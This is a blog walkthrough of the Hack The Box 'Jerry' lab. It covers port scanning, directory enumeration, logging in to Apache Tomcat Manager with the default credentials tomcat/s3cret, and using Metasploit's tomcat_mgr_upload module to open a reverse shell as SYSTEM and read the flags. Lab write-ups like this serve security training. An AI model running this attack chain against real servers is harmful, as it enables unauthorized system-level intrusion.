top of page


First you need to copy the IP of the target machine - You can find it in your Hack The Box account. For this walkthrough the IP of the target is but you will have a different one.

As usual let's start with nmap:

nmap -sC -sV

We are suggested to try -Pn so let's try:

nmap -sV -Pn

Port 8080 is open so let's open our browser and type in the url bar:

We get this website

As usual let's first do a gobuster to enumerate any hidden directories on this website. Type:

gobuster dir -u -w /opt/useful/SecLists/Discovery/Web-Content/common.txt -x php

We can look into each of these directories but one that stands out is /manager so let's open our browser and type the following in the url bar:

We are prompted for a login. Let's try our luck and enter admin as username and admin as the password. We get the following error message:

Looks like there are some credentials here. tomcat as the username and s3cret as the password.

Let's try to login again but this time with tomcat and s3cret.

Open the browser and type in the url bar:

But this time we are unable to provide our login details and we go straight to the error message.

Let's clear our cookies, close the browser and try again!

This time we get the login page back, so let's enter tomcat as the username and s3cret as the password:

This time we are in!

Now let's google the following "Apache Tomcat Reverse Shell" and see what we can find. The first link seems interesting :

Let's follow the steps in the article. Looks like they are using 2 metasploit exploits, one to get the credentials (which we already found) and a second exploit to get a shell on the target machine.

First we need to open Metasploit, so from your command prompt, type:


search tomcat

As recommended in the article, let's use auxiliary/scanner/http/tomcat_mgr_login so type:

use auxiliary/scanner/http/tomcat_mgr_login 


show options

For the exploit to work, we are required to provide the following:

RHOSTS - remote Host

RPORT - remote Port


set RPORT 8080

now let's run the exploit:


We get 1 Login Successful with username tomcat and password s3cret

Still following the article above, let's look for the second exploit:

search tomcat_mgr

use exploit/multi/http/tomcat_mgr_upload

show options

We need to provide RHOSTS (remote host) and RPORT (remote port) along with LHOST (local host) and LPORT (local port) for the exploit to work.

set RPORT 8080

For LHOST we provide the IP of our machine. You can find it by opening a new command prompt window on your machine and type ifconfig

set LPORT 4444

Now that we have set up everything, let's run the exploit


ok it didn't work! that's because it needs a username and a password to access

We found the username and the password earlier. Username is tomcat and password is s3cret so let's set that up too:

set HttpPassword s3cret
set HttpUsername tomcat


Great! now we got the shell!

First type:



We are nt authority\system which is a powerful account with unrestricted access to the system!

cd C:/

Flags are often in the C:\Users\Administrator\Desktop directory so let's type:

cd C:\Users\Administrator\Desktop


cd flags


type "2 for the price of 1.txt"

We got both the user flag and the root flag!

Don't forget to copy paste these flags and submit these flags in your Hack The Box account to be able to fully own the Jerry machine.

261 views0 comments

Recent Posts

See All





Rated 0 out of 5 stars.
No ratings yet

Add a rating
bottom of page